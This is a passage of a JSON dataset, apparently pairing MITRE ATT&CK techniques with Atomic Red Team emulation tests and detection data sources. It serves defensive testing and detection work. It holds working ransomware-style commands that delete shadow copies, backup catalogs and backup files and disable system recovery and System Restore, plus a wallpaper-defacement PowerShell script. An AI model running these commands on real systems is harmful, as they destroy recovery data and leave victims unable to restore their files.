"collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that 
are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "started", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "stopped", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and 
typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + 
"data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process termination", + "description": "A process was terminated.", + "source_data_element": "user", + "relationship": "terminated", + "target_data_element": "process" + } + ], + "external_reference": [ + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1490", + "command_list": [ + "vssadmin.exe delete shadows /all /quiet\n", + "wmic.exe shadowcopy delete\n", + "wbadmin delete catalog -quiet\n", + "bcdedit.exe 
/set {default} bootstatuspolicy ignoreallfailures\nbcdedit.exe /set {default} recoveryenabled no\n", + "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}\n", + "del /s /f /q c:\\*.VHD c:\\*.bac c:\\*.bak c:\\*.wbcat c:\\*.bkf c:\\Backup*.* c:\\backup*.* c:\\*.set c:\\*.win c:\\*.dsk\n", + "wbadmin delete systemstatebackup -keepVersions:0\n", + "schtasks.exe /Change /TN \"\\Microsoft\\Windows\\SystemRestore\\SR\" /disable\n", + "reg add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore\" /v \"DisableConfig\" /t \"REG_DWORD\" /d \"1\" /f\nreg add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore\" /v \"DisableSR\" /t \"REG_DWORD\" /d \"1\" /f\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\" /v \"DisableConfig\" /t \"REG_DWORD\" /d \"1\" /f\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\" /v \"DisableSR\" /t \"REG_DWORD\" /d \"1\" /f\n" + ], + "commands": [ + { + "command": "vssadmin.exe delete shadows /all /quiet\n", + "source": "atomics/T1490/T1490.yaml", + "name": "Atomic Red Team Test - Inhibit System Recovery" + }, + { + "command": "wmic.exe shadowcopy delete\n", + "source": "atomics/T1490/T1490.yaml", + "name": "Atomic Red Team Test - Inhibit System Recovery" + }, + { + "command": "wbadmin delete catalog -quiet\n", + "source": "atomics/T1490/T1490.yaml", + "name": "Atomic Red Team Test - Inhibit System Recovery" + }, + { + "command": "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\nbcdedit.exe /set {default} recoveryenabled no\n", + "source": "atomics/T1490/T1490.yaml", + "name": "Atomic Red Team Test - Inhibit System Recovery" + }, + { + "command": "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}\n", + "source": "atomics/T1490/T1490.yaml", + "name": "Atomic Red Team Test - Inhibit System Recovery" + }, + { + "command": "del /s /f /q c:\\*.VHD c:\\*.bac c:\\*.bak c:\\*.wbcat c:\\*.bkf c:\\Backup*.* c:\\backup*.* c:\\*.set 
c:\\*.win c:\\*.dsk\n", + "source": "atomics/T1490/T1490.yaml", + "name": "Atomic Red Team Test - Inhibit System Recovery" + }, + { + "command": "wbadmin delete systemstatebackup -keepVersions:0\n", + "source": "atomics/T1490/T1490.yaml", + "name": "Atomic Red Team Test - Inhibit System Recovery" + }, + { + "command": "schtasks.exe /Change /TN \"\\Microsoft\\Windows\\SystemRestore\\SR\" /disable\n", + "source": "atomics/T1490/T1490.yaml", + "name": "Atomic Red Team Test - Inhibit System Recovery" + }, + { + "command": "reg add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore\" /v \"DisableConfig\" /t \"REG_DWORD\" /d \"1\" /f\nreg add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore\" /v \"DisableSR\" /t \"REG_DWORD\" /d \"1\" /f\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\" /v \"DisableConfig\" /t \"REG_DWORD\" /d \"1\" /f\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\" /v \"DisableSR\" /t \"REG_DWORD\" /d \"1\" /f\n", + "source": "atomics/T1490/T1490.yaml", + "name": "Atomic Red Team Test - Inhibit System Recovery" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1490", + "display_name": "Inhibit System Recovery", + "atomic_tests": [ + { + "name": "Windows - Delete Volume Shadow Copies", + "auto_generated_guid": "43819286-91a9-4369-90ed-d31fb4da2c01", + "description": "Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon\nexecution, if no shadow volumes exist the message \"No items found that satisfy the query.\" will be displayed. If shadow volumes are present, it\nwill delete them without printing output to the screen. This is because the /quiet parameter was passed which also suppresses the y/n\nconfirmation prompt. 
Shadow copies can only be created on Windows server or Windows 8.\n\nhttps://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc788055(v=ws.11)\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Create volume shadow copy of C:\\ . This prereq command only works on Windows Server or Windows 8.\n", + "prereq_command": "if(!(vssadmin.exe list shadows | findstr \"No items found that satisfy the query.\")) { exit 0 } else { exit 1 }\n", + "get_prereq_command": "vssadmin.exe create shadow /for=c:\n" + } + ], + "executor": { + "command": "vssadmin.exe delete shadows /all /quiet\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Windows - Delete Volume Shadow Copies via WMI", + "auto_generated_guid": "6a3ff8dd-f49c-4272-a658-11c2fe58bd88", + "description": "Deletes Windows Volume Shadow Copies via WMI. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.\nShadow copies can only be created on Windows server or Windows 8.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "wmic.exe shadowcopy delete\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Windows - wbadmin Delete Windows Backup Catalog", + "auto_generated_guid": "263ba6cb-ea2b-41c9-9d4e-b652dadd002c", + "description": "Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. 
Upon execution,\n\"The backup catalog has been successfully deleted.\" will be displayed in the PowerShell session.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "wbadmin delete catalog -quiet\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Windows - Disable Windows Recovery Console Repair", + "auto_generated_guid": "cf21060a-80b3-4238-a595-22525de4ab81", + "description": "Disables repair by the Windows Recovery Console on boot. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.\nUpon execution, \"The operation completed successfully.\" will be displayed in the powershell session.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\nbcdedit.exe /set {default} recoveryenabled no\n", + "cleanup_command": "bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures >nul 2>&1\nbcdedit.exe /set {default} recoveryenabled yes >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Windows - Delete Volume Shadow Copies via WMI with PowerShell", + "auto_generated_guid": "39a295ca-7059-4a88-86f6-09556c1211e7", + "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject.\nThis technique is used by numerous ransomware families such as Sodinokibi/REvil.\nExecutes Get-WMIObject. Shadow copies can only be created on Windows server or Windows 8, so upon execution\nthere may be no output displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Windows - Delete Backup Files", + "auto_generated_guid": "6b1dbaf6-cc8a-4ea6-891f-6058569653bf", + "description": "Deletes backup files in a manner similar to Ryuk ransomware. 
Upon exection, many \"access is denied\" messages will appear as the commands try\nto delete files from around the system.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "del /s /f /q c:\\*.VHD c:\\*.bac c:\\*.bak c:\\*.wbcat c:\\*.bkf c:\\Backup*.* c:\\backup*.* c:\\*.set c:\\*.win c:\\*.dsk\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Windows - wbadmin Delete systemstatebackup", + "auto_generated_guid": "584331dd-75bc-4c02-9e0b-17f5fd81c748", + "description": "Deletes the Windows systemstatebackup using wbadmin.exe. This technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "wbadmin delete systemstatebackup -keepVersions:0\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Windows - Disable the SR scheduled task", + "auto_generated_guid": "1c68c68d-83a4-4981-974e-8993055fa034", + "description": "Use schtasks.exe to disable the System Restore (SR) scheduled task\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "schtasks.exe /Change /TN \"\\Microsoft\\Windows\\SystemRestore\\SR\" /disable\n", + "cleanup_command": "schtasks.exe /Change /TN \"\\Microsoft\\Windows\\SystemRestore\\SR\" /enable >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Disable System Restore Through Registry", + "auto_generated_guid": "66e647d1-8741-4e43-b7c1-334760c2047f", + "description": "Modify the registry of the currently logged in user using reg.exe via cmd console to disable system restore on the computer. 
\nSee how remcos RAT abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "reg add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore\" /v \"DisableConfig\" /t \"REG_DWORD\" /d \"1\" /f\nreg add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore\" /v \"DisableSR\" /t \"REG_DWORD\" /d \"1\" /f\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\" /v \"DisableConfig\" /t \"REG_DWORD\" /d \"1\" /f\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\" /v \"DisableSR\" /t \"REG_DWORD\" /d \"1\" /f\n", + "cleanup_command": "reg delete \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore\" /v \"DisableConfig\" /f >nul 2>&1\nreg delete \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore\" /v \"DisableSR\" /f >nul 2>&1\nreg delete \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\" /v \"DisableConfig\" /f >nul 2>&1\nreg delete \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\" /v \"DisableSR\" /f >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ 
+ "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + 
], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "started", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "stopped", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ 
+ "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1491.001", + "command_list": [ + "$url = \"https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png\"\n$imgLocation = 
\"#{wallpaper_location}\"\n$orgWallpaper = (Get-ItemProperty -Path Registry::'HKEY_CURRENT_USER\\Control Panel\\Desktop\\' -Name WallPaper).WallPaper\n$orgWallpaper | Out-File -FilePath \"#{pointer_to_orginal_wallpaper}\"\n$updateWallpapercode = @' \nusing System.Runtime.InteropServices; \nnamespace Win32{\n\n public class Wallpaper{ \n [DllImport(\"user32.dll\", CharSet=CharSet.Auto)] \n static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; \n \n public static void SetWallpaper(string thePath){ \n SystemParametersInfo(20,0,thePath,3); \n }\n }\n} \n'@\n$wc = New-Object System.Net.WebClient \ntry{ \n $wc.DownloadFile($url, $imgLocation)\n add-type $updateWallpapercode \n [Win32.Wallpaper]::SetWallpaper($imgLocation)\n} \ncatch [System.Net.WebException]{ \n Write-Host(\"Cannot download $url\") \n add-type $updateWallpapercode \n [Win32.Wallpaper]::SetWallpaper($imgLocation)\n} \nfinally{ \n $wc.Dispose() \n}\n", + "$url = \"#{url_of_wallpaper}\"\n$imgLocation = \"#{wallpaper_location}\"\n$orgWallpaper = (Get-ItemProperty -Path Registry::'HKEY_CURRENT_USER\\Control Panel\\Desktop\\' -Name WallPaper).WallPaper\n$orgWallpaper | Out-File -FilePath \"$env:TEMP\\T1491.001-OrginalWallpaperLocation\"\n$updateWallpapercode = @' \nusing System.Runtime.InteropServices; \nnamespace Win32{\n\n public class Wallpaper{ \n [DllImport(\"user32.dll\", CharSet=CharSet.Auto)] \n static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; \n \n public static void SetWallpaper(string thePath){ \n SystemParametersInfo(20,0,thePath,3); \n }\n }\n} \n'@\n$wc = New-Object System.Net.WebClient \ntry{ \n $wc.DownloadFile($url, $imgLocation)\n add-type $updateWallpapercode \n [Win32.Wallpaper]::SetWallpaper($imgLocation)\n} \ncatch [System.Net.WebException]{ \n Write-Host(\"Cannot download $url\") \n add-type $updateWallpapercode \n [Win32.Wallpaper]::SetWallpaper($imgLocation)\n} \nfinally{ \n $wc.Dispose() 
\n}\n", + "$url = \"#{url_of_wallpaper}\"\n$imgLocation = \"$env:TEMP\\T1491.001-newWallpaper.png\"\n$orgWallpaper = (Get-ItemProperty -Path Registry::'HKEY_CURRENT_USER\\Control Panel\\Desktop\\' -Name WallPaper).WallPaper\n$orgWallpaper | Out-File -FilePath \"#{pointer_to_orginal_wallpaper}\"\n$updateWallpapercode = @' \nusing System.Runtime.InteropServices; \nnamespace Win32{\n\n public class Wallpaper{ \n [DllImport(\"user32.dll\", CharSet=CharSet.Auto)] \n static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; \n \n public static void SetWallpaper(string thePath){ \n SystemParametersInfo(20,0,thePath,3); \n }\n }\n} \n'@\n$wc = New-Object System.Net.WebClient \ntry{ \n $wc.DownloadFile($url, $imgLocation)\n add-type $updateWallpapercode \n [Win32.Wallpaper]::SetWallpaper($imgLocation)\n} \ncatch [System.Net.WebException]{ \n Write-Host(\"Cannot download $url\") \n add-type $updateWallpapercode \n [Win32.Wallpaper]::SetWallpaper($imgLocation)\n} \nfinally{ \n $wc.Dispose() \n}\n" + ], + "commands": [ + { + "command": "$url = \"https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png\"\n$imgLocation = \"#{wallpaper_location}\"\n$orgWallpaper = (Get-ItemProperty -Path Registry::'HKEY_CURRENT_USER\\Control Panel\\Desktop\\' -Name WallPaper).WallPaper\n$orgWallpaper | Out-File -FilePath \"#{pointer_to_orginal_wallpaper}\"\n$updateWallpapercode = @' \nusing System.Runtime.InteropServices; \nnamespace Win32{\n\n public class Wallpaper{ \n [DllImport(\"user32.dll\", CharSet=CharSet.Auto)] \n static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; \n \n public static void SetWallpaper(string thePath){ \n SystemParametersInfo(20,0,thePath,3); \n }\n }\n} \n'@\n$wc = New-Object System.Net.WebClient \ntry{ \n $wc.DownloadFile($url, $imgLocation)\n add-type $updateWallpapercode \n [Win32.Wallpaper]::SetWallpaper($imgLocation)\n} \ncatch [System.Net.WebException]{ \n 
Write-Host(\"Cannot download $url\") \n add-type $updateWallpapercode \n [Win32.Wallpaper]::SetWallpaper($imgLocation)\n} \nfinally{ \n $wc.Dispose() \n}\n", + "source": "atomics/T1491.001/T1491.001.yaml", + "name": "Atomic Red Team Test - Defacement: Internal Defacement" + }, + { + "command": "$url = \"#{url_of_wallpaper}\"\n$imgLocation = \"#{wallpaper_location}\"\n$orgWallpaper = (Get-ItemProperty -Path Registry::'HKEY_CURRENT_USER\\Control Panel\\Desktop\\' -Name WallPaper).WallPaper\n$orgWallpaper | Out-File -FilePath \"$env:TEMP\\T1491.001-OrginalWallpaperLocation\"\n$updateWallpapercode = @' \nusing System.Runtime.InteropServices; \nnamespace Win32{\n\n public class Wallpaper{ \n [DllImport(\"user32.dll\", CharSet=CharSet.Auto)] \n static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; \n \n public static void SetWallpaper(string thePath){ \n SystemParametersInfo(20,0,thePath,3); \n }\n }\n} \n'@\n$wc = New-Object System.Net.WebClient \ntry{ \n $wc.DownloadFile($url, $imgLocation)\n add-type $updateWallpapercode \n [Win32.Wallpaper]::SetWallpaper($imgLocation)\n} \ncatch [System.Net.WebException]{ \n Write-Host(\"Cannot download $url\") \n add-type $updateWallpapercode \n [Win32.Wallpaper]::SetWallpaper($imgLocation)\n} \nfinally{ \n $wc.Dispose() \n}\n", + "source": "atomics/T1491.001/T1491.001.yaml", + "name": "Atomic Red Team Test - Defacement: Internal Defacement" + }, + { + "command": "$url = \"#{url_of_wallpaper}\"\n$imgLocation = \"$env:TEMP\\T1491.001-newWallpaper.png\"\n$orgWallpaper = (Get-ItemProperty -Path Registry::'HKEY_CURRENT_USER\\Control Panel\\Desktop\\' -Name WallPaper).WallPaper\n$orgWallpaper | Out-File -FilePath \"#{pointer_to_orginal_wallpaper}\"\n$updateWallpapercode = @' \nusing System.Runtime.InteropServices; \nnamespace Win32{\n\n public class Wallpaper{ \n [DllImport(\"user32.dll\", CharSet=CharSet.Auto)] \n static extern int SystemParametersInfo (int uAction , int uParam , string 
lpvParam , int fuWinIni) ; \n \n public static void SetWallpaper(string thePath){ \n SystemParametersInfo(20,0,thePath,3); \n }\n }\n} \n'@\n$wc = New-Object System.Net.WebClient \ntry{ \n $wc.DownloadFile($url, $imgLocation)\n add-type $updateWallpapercode \n [Win32.Wallpaper]::SetWallpaper($imgLocation)\n} \ncatch [System.Net.WebException]{ \n Write-Host(\"Cannot download $url\") \n add-type $updateWallpapercode \n [Win32.Wallpaper]::SetWallpaper($imgLocation)\n} \nfinally{ \n $wc.Dispose() \n}\n", + "source": "atomics/T1491.001/T1491.001.yaml", + "name": "Atomic Red Team Test - Defacement: Internal Defacement" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1491.001", + "display_name": "Defacement: Internal Defacement", + "atomic_tests": [ + { + "name": "Replace Desktop Wallpaper", + "auto_generated_guid": "30558d53-9d76-41c4-9267-a7bd5184bed3", + "description": "Downloads an image from a URL and sets it as the desktop wallpaper.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "url_of_wallpaper": { + "description": "URL pointing to the image file you wish to set as wallpaper", + "type": "Url", + "default": "https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png" + }, + "pointer_to_orginal_wallpaper": { + "description": "Full path to where a file containing the original wallpaper location will be saved", + "type": "String", + "default": "$env:TEMP\\T1491.001-OrginalWallpaperLocation" + }, + "wallpaper_location": { + "description": "Full path to where the downloaded wallpaper image will be saved", + "type": "String", + 